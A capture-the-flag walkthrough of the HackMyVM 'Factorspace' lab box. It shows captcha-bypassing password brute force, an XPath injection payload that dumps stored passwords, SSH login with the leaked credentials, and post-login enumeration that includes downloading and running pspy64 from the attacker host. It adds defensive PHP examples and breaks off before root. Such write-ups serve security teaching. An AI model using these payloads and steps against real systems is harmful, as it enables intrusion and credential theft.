[HackMyVM] Factorspace box

kali: 192.168.56.104

Target: 192.168.56.138

Port scan

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:38 CST
Nmap scan report for 192.168.56.138
Host is up (0.000081s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:DD:D8:ED (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

Two ports: 22 and 80.

A quick directory scan.

# gobuster dir -u http://192.168.56.138   -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.138/images/]
/login.php            (Status: 200) [Size: 2346]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 19579]
/icon                 (Status: 301) [Size: 315] [--> http://192.168.56.138/icon/]
/results.php          (Status: 302) [Size: 115] [--> login.php]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.138/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.138/js/]
/check.php            (Status: 302) [Size: 0] [--> login.php]
/auth.php             (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.138/fonts/]
/parent               (Status: 301) [Size: 317] [--> http://192.168.56.138/parent/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

There are login, results, check and auth; presumably the login-related PHP files.

Let's have a look at the web site.

Nothing remarkable, and nothing notable in the page source either.

Went straight to those PHP files; the other ones all redirect to login.php, so this is the only place to start.

The login page also has a captcha.

Enter something random and capture the request.

The POST goes to auth.php with three parameters: username, password and captcha.

The captcha is fetched from this URL:

http://192.168.56.138/auth.php?generate_captcha=1

Now the only option left is brute-forcing the password; my blind guess for the username is admin.

The captcha presumably stays the same within one session, so it cannot stop brute force.

The password came out as iloveyou.
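The weakness above is that one captcha value keeps being accepted for the whole session. As an added example (not the box's own auth.php), here is a login handler with the same three POST fields in which the captcha is spent on the first check, so replaying it fails. The CLI demo at the bottom fakes $_SESSION and uses a constructed password; in a web context session_start() runs first.

```php
<?php
declare(strict_types=1);

// Added example, not the box's own auth.php. It keeps the three fields the
// writeup saw (username, password, captcha) but spends the captcha on the
// first check, so the replay that made the brute force possible fails.
// Web use: call session_start() before these functions; the demo at the
// bottom fakes $_SESSION so it runs from the CLI.

const CAPTCHA_TTL = 120;                       // seconds a challenge stays valid

/** Create a challenge, keep the answer server-side, return it for rendering into an image. */
function issueCaptcha(): string
{
    $alphabet = 'ABCDEFGHJKLMNPQRSTUVWXYZ23456789';  // no 0/O, 1/I look-alikes
    $answer = '';
    for ($i = 0; $i < 6; $i++) {
        $answer .= $alphabet[random_int(0, strlen($alphabet) - 1)];
    }
    $_SESSION['captcha'] = ['answer' => $answer, 'issued' => time()];
    return $answer;
}

/** Compare once, then discard: a second POST carrying the same value must fail. */
function verifyCaptcha(?string $submitted): bool
{
    $stored = $_SESSION['captcha'] ?? null;
    unset($_SESSION['captcha']);               // spent whether or not it matches
    if ($stored === null || $submitted === null) {
        return false;
    }
    if (time() - $stored['issued'] > CAPTCHA_TTL) {
        return false;
    }
    return hash_equals($stored['answer'], strtoupper(trim($submitted)));
}

/**
 * Login handler in the shape of the writeup's POST (username, password, captcha).
 * $checkCredentials is whatever the application uses to validate a password.
 */
function handleLogin(array $post, callable $checkCredentials): string
{
    if (!verifyCaptcha($post['captcha'] ?? null)) {
        return 'captcha invalid or already used';
    }
    $user = (string) ($post['username'] ?? '');
    $pass = (string) ($post['password'] ?? '');
    if (!$checkCredentials($user, $pass)) {
        return 'login failed';                  // captcha is already burned: next guess needs a new one
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);           // new session id after a successful login
    }
    $_SESSION['user'] = $user;
    return 'ok';
}

if (PHP_SAPI === 'cli') {
    $_SESSION = [];                            // stand-in for a started session
    $demoPass = 'constructed-demo-password';   // constructed value, not the box's password
    $creds = fn(string $u, string $p): bool => $u === 'admin' && hash_equals($demoPass, $p);

    $c = issueCaptcha();
    echo handleLogin(['username' => 'admin', 'password' => 'wrong', 'captcha' => $c], $creds), "\n";
    echo handleLogin(['username' => 'admin', 'password' => $demoPass, 'captcha' => $c], $creds), "\n";
    $c = issueCaptcha();
    echo handleLogin(['username' => 'admin', 'password' => $demoPass, 'captcha' => $c], $creds), "\n";
}
```

Run from the CLI, the first attempt fails on the password, the second fails on the captcha even though the password is now right (the value was consumed by the first attempt), and only the third, with a freshly issued captcha, succeeds. The captcha alone only slows guessing to one request per image; the complement is a failed-attempt counter keyed by username or source address and stored server-side, not in the session cookie the client controls.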

After logging in there is a name search box.

Testing showed what looked like SQL injection, but why did my own quote-closing not work?

A web search on the behaviour showed that this is XPath injection.

Then I found a blog on CSDN explaining XPath injection:

浅谈Xpath注入漏洞 - CSDN blog

It gives this payload:

']|//*|//*['

The leading '] closes the [' before it in the query, the trailing [' is closed by the '] that follows it, and the //* in the middle selects every element in the document.

$query = "user/username[@name='']|//*|//*['']";   // the query as it reads once the payload is substituted

With this payload the passwords of the three people came out.

Testing showed that only qyxG27KGkW0x9SJ1 could log in to jackie's SSH.
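To show concretely why the quote-closing payload works and what stops it, here is an added example that is not the box's auth.php or results.php: the same query shape as above, run against a constructed stand-in for employee_info_2023.xml (whose real content the writeup does not show), beside a hardened search that allow-lists the username and encodes it as an XPath string literal.

```php
<?php
declare(strict_types=1);

// Added example, not the box's own auth.php or results.php. It shows the query
// shape from the writeup, what the quoted payload turns it into, and one
// hardened version. The XML below is a constructed stand-in for
// employee_info_2023.xml, whose real content the writeup does not show.
$xml = <<<'XML'
<users>
  <user><username name="jackie"/><password>demo-pass-1</password></user>
  <user><username name="alice"/><password>demo-pass-2</password></user>
  <user><username name="bob"/><password>demo-pass-3</password></user>
</users>
XML;

$doc = new DOMDocument();
$doc->loadXML($xml);
$root = $doc->documentElement;            // <users>: context node for the relative path

/** Flatten matched elements into "tag[name]=text" strings for display. */
function describe(DOMNodeList $nodes): array
{
    $out = [];
    foreach ($nodes as $n) {
        if (!$n instanceof DOMElement) {
            continue;
        }
        $label = $n->nodeName . ($n->hasAttribute('name') ? '[' . $n->getAttribute('name') . ']' : '');
        $out[] = $label . '=' . preg_replace('/\s+/', ' ', trim($n->textContent));
    }
    return $out;
}

/** Vulnerable: the username is concatenated straight into the expression. */
function searchVulnerable(DOMDocument $doc, DOMElement $ctx, string $name): array
{
    $xpath = new DOMXPath($doc);
    $query = "user/username[@name='" . $name . "']";   // same shape as the writeup's query
    $nodes = @$xpath->query($query, $ctx);             // false (plus a warning) on a malformed expression
    return $nodes === false ? [] : describe($nodes);
}

/** Encode any string as an XPath 1.0 string literal so it can never close the predicate. */
function xpathLiteral(string $s): string
{
    if (strpos($s, "'") === false) {
        return "'" . $s . "'";
    }
    if (strpos($s, '"') === false) {
        return '"' . $s . '"';
    }
    // Both quote kinds present: concat('part', "'", 'part', ...)
    $parts = array_map(fn(string $p): string => "'" . $p . "'", explode("'", $s));
    return 'concat(' . implode(', "\'", ', $parts) . ')';
}

/** Hardened: allow-list the username alphabet first, then quote what is left as a literal. */
function searchHardened(DOMDocument $doc, DOMElement $ctx, string $name): array
{
    if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $name)) {
        return [];                                     // refuse; log the attempt, never echo the input
    }
    $xpath = new DOMXPath($doc);
    $query = 'user/username[@name=' . xpathLiteral($name) . ']';
    $nodes = $xpath->query($query, $ctx);
    return $nodes === false ? [] : describe($nodes);
}

$payload = "']|//*|//*['";                             // the payload quoted in the writeup
echo "vulnerable, normal input : ", implode(', ', searchVulnerable($doc, $root, 'jackie')), "\n";
echo "vulnerable, payload      : ", implode(', ', searchVulnerable($doc, $root, $payload)), "\n";
echo "hardened, normal input   : ", implode(', ', searchHardened($doc, $root, 'jackie')), "\n";
echo "hardened, payload        : ", (implode(', ', searchHardened($doc, $root, $payload)) ?: '(rejected)'), "\n";
```

With normal input both searches return just username[jackie]. With the payload the vulnerable query becomes a union whose middle branch //* matches every element, so the output includes every password element of the document, which is exactly the leak the writeup used. The hardened search rejects the payload at the allow-list; even if the allow-list were relaxed, xpathLiteral() would turn the input into a single string literal that matches no username, because the quotes can no longer terminate the predicate.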

┌──(root㉿kali2)-[~/Desktop]
└─# ssh jackie@192.168.56.138
jackie@192.168.56.138's password: 
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jackie@factorspace:~$ whoami
jackie

Got the user flag as jackie as well.

jackie@factorspace:~$ ls -al
total 32
drwxr-xr-x 4 jackie jackie 4096 May  8  2023 .
drwxr-xr-x 3 root   root   4096 Apr  6  2023 ..
lrwxrwxrwx 1 root   root      9 Apr  6  2023 .bash_history -> /dev/null
-rw-r--r-- 1 jackie jackie  220 Apr 14  2023 .bash_logout
-rw-r--r-- 1 jackie jackie 3526 Apr 14  2023 .bashrc
drwxr-xr-x 3 jackie jackie 4096 Apr 14  2023 .local
-rw-r--r-- 1 jackie jackie  809 Apr 14  2023 .profile
drwx------ 2 jackie jackie 4096 Apr 14  2023 .ssh
-rwx------ 1 jackie jackie   33 Apr 14  2023 user.txt
jackie@factorspace:~$ cat user*
eb7d964a2a41006bb325cf822db664be

jackie is the only user under /home, so privilege escalation has to revolve around this account.

jackie@factorspace:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Apr  6  2023 .
drwxr-xr-x 18 root   root   4096 Feb  6  2023 ..
drwxr-xr-x  4 jackie jackie 4096 May  8  2023 jackie

Check sudo -l.

jackie@factorspace:~$ sudo -l
-bash: sudo: command not found

Nothing.

See whether the html directory contains anything.

jackie@factorspace:/var/www/html$ ls -al
total 76
drwxr-xr-x 8 root root  4096 May  8  2023 .
drwxr-xr-x 3 root root  4096 Apr  9  2023 ..
-rw-r--r-- 1 root root  2009 Apr 14  2023 auth.php
-rw-r--r-- 1 root root   214 Apr 14  2023 check.php
drwxr-xr-x 2 root root  4096 Apr 14  2023 css
-rw-r--r-- 1 root root   544 Apr 14  2023 employee_info_2023.xml
-rw-r--r-- 1 root root  1373 Apr 14  2023 employee_search_filter.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 fonts
drwxr-xr-x 2 root root  4096 Apr 14  2023 icon
drwxr-xr-x 2 root root  4096 Apr 14  2023 images
-rw-r--r-- 1 root root 19579 Apr 14  2023 index.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 industrial-html
drwxr-xr-x 3 root root  4096 Apr 14  2023 js
-rw-r--r-- 1 root root  2346 Apr 14  2023 login.php
-rw-r--r-- 1 root root   634 Apr 14  2023 results.php

Nothing.

Check the cron jobs.

jackie@factorspace:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Nothing.

Check SUID binaries.

jackie@factorspace:/$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount

Nothing.

Check the kernel version.

jackie@factorspace:/$ uname -a
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux

Fairly recent; a kernel exploit is probably not the intended route.

Run pspy64 to watch the processes.

jackie@factorspace:~$ wget http://192.168.56.104:6677/pspy64
--2024-03-30 03:40:21--  http://192.168.56.104:6677/pspy64
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64                          100%[=====================================================>]   2.94M  --.-KB/s    in 0.03s   

2024-03-30 03:40:21 (93.5 MB/s) - 'pspy64' saved [3078592/3078592]

jackie@factorspace:~$ chmod +x pspy64
jackie@factorspace:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/03/30 03:40:31 CMD: UID=1000 PID=987    | -bash 
2024/03/30 03:40:31 CMD: UID=1000 PID=986    | sshd: jackie@pts/0   
2024/03/30 03:40:31 CMD: UID=1000 PID=977    | (sd-pam) 
2024/03/30 03:40:31 CMD: UID=1000 PID=976    | /lib/systemd/systemd --user 
2024/03/30 03:40:31 CMD: UID=0    PID=973    | sshd: jackie [priv]  
2024/03/30 03:40:31 CMD: UID=0    PID=920    | 
2024/03/30 03:40:31 CMD: UID=0    PID=9      | 
2024/03/30 03:40:31 CMD: UID=0    PID=850    | 
2024/03/30 03:40:31 CMD: UID=33   PID=804    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=8      | 
2024/03/30 03:40:31 CMD: UID=0    PID=67     | 
2024/03/30 03:40:31 CMD: UID=0    PID=66     | 
2024/03/30 03:40:31 CMD: UID=0    PID=63     | 
2024/03/30 03:40:31 CMD: UID=0    PID=6      | 
2024/03/30 03:40:31 CMD: UID=33   PID=538    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=534    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=533    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=532    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=531    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=530    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=53     | 
2024/03/30 03:40:31 CMD: UID=33   PID=529    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=52     | 
2024/03/30 03:40:31 CMD: UID=0    PID=51     | 
2024/03/30 03:40:31 CMD: UID=0    PID=50     | 
2024/03/30 03:40:31 CMD: UID=0    PID=48     | 
2024/03/30 03:40:31 CMD: UID=0    PID=47     | 
2024/03/30 03:40:31 CMD: UID=0    PID=466    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=461    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2024/03/30 03:40:31 CMD: UID=0    PID=46     | 
2024/03/30 03:40:31 CMD: UID=0    PID=45     | 
2024/03/30 03:40:31 CMD: UID=0    PID=447    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2024/03/30 03:40:31 CMD: UID=0    PID=44     | 
2024/03/30 03:40:31 CMD: UID=0    PID=43     | 
2024/03/30 03:40:31 CMD: UID=0    PID=402    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2024/03/30 03:40:31 CMD: UID=0    PID=4      | 
2024/03/30 03:40:31 CMD: UID=0    PID=395    | /lib/systemd/systemd-logind 
2024/03/30 03:40:31 CMD: UID=0    PID=390    | /usr/sbin/rsyslogd -n -iNONE 
2024/03/30 03:40:31 CMD: UID=103  PID=376    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                                     
2024/03/30 03:40:31 CMD: UID=0    PID=375    | /usr/sbin/cron -f 
2024/03/30 03:40:31 CMD: UID=0    PID=344    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:31 CMD: UID=0    PID=341    | 
2024/03/30 03:40:31 CMD: UID=104  PID=340    | /lib/systemd/systemd-timesyncd 
2024/03/30 03:40:31 CMD: UID=0    PID=338    | 
2024/03/30 03:40:31 CMD: UID=0    PID=337    | 
2024/03/30 03:40:31 CMD: UID=0    PID=336    | 
2024/03/30 03:40:31 CMD: UID=0    PID=334    | 
2024/03/30 03:40:31 CMD: UID=0    PID=331    | 
2024/03/30 03:40:31 CMD: UID=0    PID=329    | 
2024/03/30 03:40:31 CMD: UID=0    PID=326    | 
2024/03/30 03:40:31 CMD: UID=0    PID=322    | 
2024/03/30 03:40:31 CMD: UID=0    PID=316    | 
2024/03/30 03:40:31 CMD: UID=0    PID=3      | 
2024/03/30 03:40:31 CMD: UID=0    PID=250    | 
2024/03/30 03:40:31 CMD: UID=0    PID=25     | 
2024/03/30 03:40:31 CMD: UID=0    PID=24     | 
2024/03/30 03:40:31 CMD: UID=0    PID=23     | 
2024/03/30 03:40:31 CMD: UID=0    PID=22     | 
2024/03/30 03:40:31 CMD: UID=0    PID=21     | 
2024/03/30 03:40:31 CMD: UID=0    PID=205    | /lib/systemd/systemd-udevd 
2024/03/30 03:40:31 CMD: UID=0    PID=20     | 
2024/03/30 03:40:31 CMD: UID=0    PID=2      | 
2024/03/30 03:40:31 CMD: UID=0    PID=19     | 
2024/03/30 03:40:31 CMD: UID=0    PID=185    | /lib/systemd/systemd-journald 
2024/03/30 03:40:31 CMD: UID=0    PID=18     | 
2024/03/30 03:40:31 CMD: UID=0    PID=17     | 
2024/03/30 03:40:31 CMD: UID=0    PID=15     | 
2024/03/30 03:40:31 CMD: UID=0    PID=149    | 
2024/03/30 03:40:31 CMD: UID=0    PID=148    | 
2024/03/30 03:40:31 CMD: UID=0    PID=13     | 
2024/03/30 03:40:31 CMD: UID=1000 PID=1208   | ./pspy64 
2024/03/30 03:40:31 CMD: UID=0    PID=1207   | 
2024/03/30 03:40:31 CMD: UID=0    PID=1205   | /bin/sleep 10 
2024/03/30 03:40:31 CMD: UID=0    PID=12     | 
2024/03/30 03:40:31 CMD: UID=0    PID=112    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1106   | 
2024/03/30 03:40:31 CMD: UID=0    PID=110    | 
2024/03/30 03:40:31 CMD: UID=0    PID=11     | 
2024/03/30 03:40:31 CMD: UID=0    PID=109    | 
2024/03/30 03:40:31 CMD: UID=0    PID=108    | 
2024/03/30 03:40:31 CMD: UID=0    PID=107    | 
2024/03/30 03:40:31 CMD: UID=0    PID=106    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1055   | 
2024/03/30 03:40:31 CMD: UID=0    PID=105    | 
2024/03/30 03:40:31 CMD: UID=0    PID=104    | 
2024/03/30 03:40:31 CMD: UID=0    PID=10     | 
2024/03/30 03:40:31 CMD: UID=0    PID=1      | /sbin/init 
2024/03/30 03:40:31 CMD: UID=0    PID=1216   | /sbin/init 
2024/03/30 03:40:32 CMD: UID=0    PID=1217   | (sleep) 
2024/03/30 03:40:40 CMD: UID=0    PID=1218   | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:40 CMD: UID=0    PID=1219   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1220   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1221   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1222   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:42 CMD: UID=0    PID=1223   | /sbin/init 
2024/03/30 03:40:42 CMD: UID=0    PID=1224   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1225   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1226   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1227   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1228   | /sbin/init 
2024/03/30 03:41:12 CMD: UID=0    PID=1229   | /sbin/init 
2024/03/30 03:41:13 CMD: UID=0    PID=1230   | /sbin/init 

Nothing.

Run linpeas.

Still nothing.

Try ps auxww.

jackie@factorspace:~/.ssh$  ps auxww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  1.0 163708 10048 ?        Ss   03:04   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    03:04   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/0:0H-events_highpri]
root           8  0.0  0.0      0     0 ?        I<   03:04   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_rude_]
root          10  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_trace]
root          11  0.3  0.0      0     0 ?        S    03:04   0:12 [ksoftirqd/0]
root          12  0.1  0.0      0     0 ?        I    03:04   0:04 [rcu_sched]
root          13  0.0  0.0      0     0 ?        S    03:04   0:00 [migration/0]
root          15  0.0  0.0      0     0 ?        S    03:04   0:00 [cpuhp/0]
root          17  0.0  0.0      0     0 ?        S    03:04   0:00 [kdevtmpfs]
root          18  0.0  0.0      0     0 ?        I<   03:04   0:00 [netns]
root          19  0.0  0.0      0     0 ?        S    03:04   0:00 [kauditd]
root          20  0.0  0.0      0     0 ?        S    03:04   0:00 [khungtaskd]
root          21  0.0  0.0      0     0 ?        S    03:04   0:00 [oom_reaper]
root          22  0.0  0.0      0     0 ?        I<   03:04   0:00 [writeback]
root          23  0.0  0.0      0     0 ?        S    03:04   0:00 [kcompactd0]
root          24  0.0  0.0      0     0 ?        SN   03:04   0:00 [ksmd]
root          25  0.0  0.0      0     0 ?        SN   03:04   0:00 [khugepaged]
root          43  0.0  0.0      0     0 ?        I<   03:04   0:00 [kintegrityd]
root          44  0.0  0.0      0     0 ?        I<   03:04   0:00 [kblockd]
root          45  0.0  0.0      0     0 ?        I<   03:04   0:00 [blkcg_punt_bio]
root          46  0.0  0.0      0     0 ?        I<   03:04   0:00 [edac-poller]
root          47  0.0  0.0      0     0 ?        I<   03:04   0:00 [devfreq_wq]
root          48  0.0  0.0      0     0 ?        I<   03:04   0:01 [kworker/0:1H-kblockd]
root          50  0.0  0.0      0     0 ?        S    03:04   0:00 [kswapd0]
root          51  0.0  0.0      0     0 ?        I<   03:04   0:00 [kthrotld]
root          52  0.0  0.0      0     0 ?        I<   03:04   0:00 [acpi_thermal_pm]
root          53  0.0  0.0      0     0 ?        I<   03:04   0:00 [ipv6_addrconf]
root          63  0.0  0.0      0     0 ?        I<   03:04   0:00 [kstrp]
root          66  0.0  0.0      0     0 ?        I<   03:04   0:00 [zswap-shrink]
root          67  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/u3:0]
root         105  0.0  0.0      0     0 ?        I<   03:04   0:00 [ata_sff]
root         106  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_0]
root         107  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_0]
root         108  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_1]
root         109  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_1]
root         110  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_2]
root         112  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_2]
root         148  0.0  0.0      0     0 ?        S    03:04   0:00 [jbd2/sda1-8]
root         149  0.0  0.0      0     0 ?        I<   03:04   0:00 [ext4-rsv-conver]
root         185  0.0  1.7  48412 17656 ?        Ss   03:04   0:01 /lib/systemd/systemd-journald
root         205  0.0  0.5  21592  5156 ?        Ss   03:04   0:00 /lib/systemd/systemd-udevd
root         250  0.0  0.0      0     0 ?        I<   03:04   0:00 [cryptd]
root         316  0.0  0.0      0     0 ?        S    03:04   0:00 [irq/18-vmwgfx]
root         322  0.0  0.0      0     0 ?        I<   03:04   0:00 [ttm_swap]
root         326  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc0]
root         329  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc1]
root         331  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc2]
root         334  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc3]
root         336  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc4]
root         337  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc5]
root         338  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc6]
systemd+     340  0.0  0.6  88440  6004 ?        Ssl  03:04   0:00 /lib/systemd/systemd-timesyncd
root         341  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc7]
root         344  0.0  0.5  99888  5740 ?        Ssl  03:04   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root         375  0.0  0.2   6748  2656 ?        Ss   03:04   0:00 /usr/sbin/cron -f
message+     376  0.0  0.4   8256  4656 ?        Ss   03:04   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         390  0.0  0.4 220800  4032 ?        Ssl  03:04   0:00 /usr/sbin/rsyslogd -n -iNONE
root         395  0.0  0.7  22056  7184 ?        Ss   03:04   0:00 /lib/systemd/systemd-logind
root         402  0.0  0.5  14620  5152 ?        Ss   03:04   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root         447  0.0  0.1   5848  1708 tty1     Ss+  03:04   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         461  0.0  0.7  13356  7720 ?        Ss   03:04   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         466  0.0  2.3 208608 23084 ?        Ss   03:04   0:00 /usr/sbin/apache2 -k start
www-data     529  0.8  1.8 209260 18452 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     530  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     531  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     532  0.8  1.8 209260 18532 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     533  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     534  0.8  1.7 209260 17456 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     538  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     804  0.6  1.7 209260 17460 ?        S    03:19   0:15 /usr/sbin/apache2 -k start
root         850  0.0  0.0      0     0 ?        I    03:22   0:00 [kworker/u2:2-flush-8:0]
root         920  0.0  0.0      0     0 ?        I    03:27   0:00 [kworker/u2:1-events_unbound]
root         973  0.0  0.9  14716  9068 ?        Ss   03:31   0:00 sshd: jackie [priv]
jackie       976  0.0  0.7  15184  7756 ?        Ss   03:31   0:00 /lib/systemd/systemd --user
jackie       977  0.0  0.2 166664  2580 ?        S    03:31   0:00 (sd-pam)
jackie       986  0.0  0.5  14716  5880 ?        S    03:31   0:00 sshd: jackie@pts/0
